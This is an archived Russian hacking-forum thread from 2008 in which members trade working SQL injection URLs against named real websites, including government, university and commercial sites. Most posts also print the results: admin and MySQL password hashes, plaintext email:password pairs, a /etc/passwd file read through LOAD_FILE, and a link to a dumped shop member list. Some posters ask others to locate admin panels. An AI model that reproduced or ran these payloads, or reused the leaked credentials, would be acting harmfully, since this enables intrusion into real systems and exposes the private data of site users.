ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #6721  
Старый 05.10.2008, 17:12
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию

Код:
http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,2,3,4,5 /*
Хекнул = )
Код:
http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,concat_ws(0x3a,login,password),3,4,5+from+users/*
Mary:c4ca4238a0b923820dcc509a6f75849b:1
Mary_admin:c81e728d9d4c2f636f067f89cc14862c:2
adm_price:063b610d39cfab2ec713e97510041189

= )

Админку не нашел кто найдет плиз скиньте в личку
 

  #6722  
Старый 05.10.2008, 20:41
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Dimi4
Цитата:
http://www.iriver.com.ua/publication.php?newsid=-1486+union+select+1,concat_ws(0x3a,login,password) ,3,4,5+from+users/*
users
Цитата:
http://www.iriver.com.ua/publication.php?newsid=-1486+union+select+1,2,3,concat_ws(0x3a,user,passwo rd),5+from+mysql.user/*
vse 4to polu4ilos dostat.. load_file pohody ne pashet (

Dobby007

1. menshe slov, pishi 4etko problemy.

2. .php?article=-1+union+select+1,2,unhex(hex(column_name)), 4,5+from+information_schema.columns+where+table_na me=0x75736572+limit+1,1--

probui etot variant.

3. eta tema ne dla voprosov )

Последний раз редактировалось sabe; 05.10.2008 в 21:19..
 

  #6723  
Старый 06.10.2008, 10:42
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

.gov


Код:
http://www.bulacan.gov.ph/newsarticle.php?id=-477+union+select+1,2,3,4,version(),6/*
5.0.45-community-nt
root:*46ADD2D575279110D198F0EBABA2CB760429D593:loc alhost
bulacan-gov:*F1E619E8130B161C9F41F8B876FB4F54AFBC0CBD:loca lhostt


Код:
http://www.sisonlgu.gov.ph/announce.php?id=-5+union+select+1,table_name,3,4+from+information_schema.tables/*
5.0.45-community-nt


Код:
http://www.mida.gov.my/en/news/view_news.php?id=-2776+union+select+version(),2,3,4/*
5.0.41-community-nt
root:*1BD747346D20A5AD9799A925D0E4FFFB43EF8378:loc alhost
midaweb:*1BD747346D20A5AD9799A925D0E4FFFB43EF8378: localhost




Код:
http://www.eastgrinstead.gov.uk/news/article.php?id=-250+union+select+version()/*
4.0.22-nt-log
 

  #6724  
Старый 06.10.2008, 14:15
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

edu ,хз баян ли.
Цитата:
http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=-353+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Username: chipsadmin@localhost
Version: 5.0.51a-3ubuntu5.1-log
Dbname: silverchips

[mychips]
cole.brown@gmail.com:bigfishy
================================================== ==============
Цитата:
http://www.cccc.edu/directory/searchResult.php?search=a&radio=lName&ID=1{SQLINJ} &submit=Submit+Query%3E
Username: theDirectory@localhost
Version: 5.0.51b
Dbname: directory

admin:dir920
msteele:fatcow11

хз куда их тулить((
кто найдет - в личку плз..
 

  #6725  
Старый 06.10.2008, 16:12
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Shops:
Цитата:
http://www.footballworldsgame.com/football-videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 %20,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.rephim.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.video-church.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 %20,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.paparazzi-online.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.itube.co.il/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.molecularstation.com/science-videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.avbulldogsmedia.ca/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.simpsy.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://ugonet.org/visions/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.foodtube.nl/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.dev.youedu.tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.yesdebtfree.org/videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.labaction.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://xianz.com/watch/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://video.polisriwijaya.ac.id/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://ebay4um.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://drlaurafanclub.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.private.canetoad.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.muslimvideos.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.phillipsfoundation.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.theperfectaudition.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.i2hot.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.iamthebestamericanidol.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.rebanada.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.video-church.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.yufcosmetics.org/videofame/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.greenplanet-tv.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.youbechef.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.videoclipromance.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.vacationrentalsbyvideos.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.xoct.in/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://video.breakbeat.com.ua/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.securiteaerienne.net/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.axsinteractive.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.onlybelieve.tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.astroshorts.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.waterandwastewater.com/videos/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.jewtube.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://indostream.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.ripn6.com/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.b-roll.net/tv/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+signup--
 

Shops + email base
  #6726  
Старый 06.10.2008, 20:31
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию Shops + email base

Shops:
Цитата:
http://www.spoofedtv.com/ugroups.php?UID=16+UNION+SELECT+1,concat_ws(0x3a,e mail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sig nup--
Цитата:
http://www.molecularstation.com/science-videos/ugroups.php?UID=-471+UNION+SELECT+1,concat_ws(0x3a,email,pwd),3,4,5 ,6,7,8,9,10,11,12,13,14,15+from+signup--
Цитата:
http://www.gospeltube.com/ugroups.php?UID=10641+UNION+SELECT+1,concat_ws(0x3 a,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+ signup--
Цитата:
http://www.footballworldsgame.com/football-videos/ugroups.php?UID=271+UNION+SELECT+1,concat_ws(0x3a, email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+si gnup--
Цитата:
http://www.yesdebtfree.org/videos/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,em ail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sign up--
Цитата:
http://cctn.org/ugroups.php?UID=69+UNION+SELECT+1,concat_ws(0x3a,e mail,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+sig nup--
Argentina Lattin Shop (12296 members)
Цитата:
http://bardhzi.altervista.org/latin.txt
 

  #6727  
Старый 06.10.2008, 20:47
nonamez
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме:
3884427

Репутация: 766


Отправить сообщение для nonamez с помощью ICQ
По умолчанию

Ну я тока начинаю в этой теме светится)))Но вот первые скули,правда пока не раскрученые))))

Цитата:
http://www.lzs.lt/?lt=1185259934&article=скуль
Точно знаю что можно дойти до конфига базы и затем лазить через пхпмайадмин.

Цитата:
mainyk.lt
Что-то на подобии минисоциальной сети только в литве...Уязвим почти каждый параметр id,но этого я не крутил....

Последний раз редактировалось nonamez; 06.10.2008 в 21:15..
 

  #6728  
Старый 06.10.2008, 22:17
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Erowid.org hacked by VITAL - Самый популярный сайт о накротиках pr 6
Цитата:
http://www.erowid.org//new.php?Y1=99999)+union+select+unhex(hex(version() ))/*
5.0.45-log
Цитата:
http://www.erowid.org/columns/teafaerie/wp-login.php
вот блог, нужно найти в базе таблу, база охретительно-большая..)
у кого чтото получится стучите в аську )

Svali.ru - pr 6
Цитата:
http://www.svali.ru/index.php?index=13&st_cmd=cmn_add&st_id=1698+union +select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14, 15,16,17,18+from+information_schema.tables/*
лог. вывод - 4 ветка.

nonamez
Цитата:
http://www.lzs.lt/?lt=1185259934&article=-1+union+select+version()/*
до конфига базы врятле доберешся... а вот юзеров можно поиметь..
Цитата:
http://www.lzs.lt/?lt=1185259934&article=-1+union+select+concat_ws(0x3a,user,pass)+from+user s/*
Цитата:
http://mainyk.lt/?pageid=20&id=-6013+union+select+version()#
да сайт действительно уязвим.. но чтото странное там творится, сейчас нету времени смотреть детальнее..

Последний раз редактировалось sabe; 07.10.2008 в 20:45..
 

  #6729  
Старый 24.10.2008, 21:22
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Boston University
Код:
http://www.bu.edu/phpbin/news/releases/display.php?id=-1552+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(version()))/*
PR=8!
там где-то даже админка есть...
 

  #6730  
Старый 24.10.2008, 22:04
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

freeware32.ru (89.111.184.177)
Google PR 4 / 10
Яндекс тІЦ 210
Database Version: 5.0.42
Database name: freeware32
User name: makarich@localhost

Цитата:
Сообщение от Dimi4  
http://freeware32.ru/index.php?name=NOD32&program=7+UNION+SELECT+1,2,3+ LIMIT+1,1--
+
Цитата:
http://freeware32.ru/index.php?name=NOD32&program=7+UNION+SELECT+LOAD_F ILE(0x2F6574632F706173737764),2,3+LIMIT+1,1--
/etc/passwd:
Цитата:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
man:x:13:15:man:/usr/share/man:/bin/false
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
nut:x:84:84:nut:/var/state/nut:/bin/false
postfix:x:207:207:postfix:/var/spool/postfix:/bin/false
smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250:portage:/var/tmp/portage:/bin/false
nobody:x:65534:65534:nobody:/:/bin/false
sshd:x:22:22:added by portage for openssh:/var/empty:/usr/sbin/nologin
mysql:x:60:60:added by portage for mysql:/dev/null:/sbin/nologin
cron:x:16:16:added by portage for cronbase:/var/spool/cron:/sbin/nologin
ftp:x:21:21:added by portage for ftpbase:/home/ftp:/sbin/nologin
proftpd:x:101:407:added by portage for proftpd:/dev/null:/sbin/nologin
apache:x:81:81:added by portage for apache:/var/www:/sbin/nologin
webmaster:x:1000:1000:Yuriy Makaev:/home/webmaster:/bin/bash
dovecot:x:97:97:added by portage for dovecot:/dev/null:/sbin/nologin
rpc:x:111:111:added by portage for portmap:/dev/null:/sbin/nologin
named:x:40:40:added by portage for bind:/etc/bind:/sbin/nologin
Robots.txt:
Цитата:
User-agent: *
Disallow: go.php
Disallow: program.php
Disallow: /banners/
Раскрытые пути:
Цитата:
/home/webmaster/www/freeware32.ru/

Последний раз редактировалось Dimi4; 24.10.2008 в 22:07..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ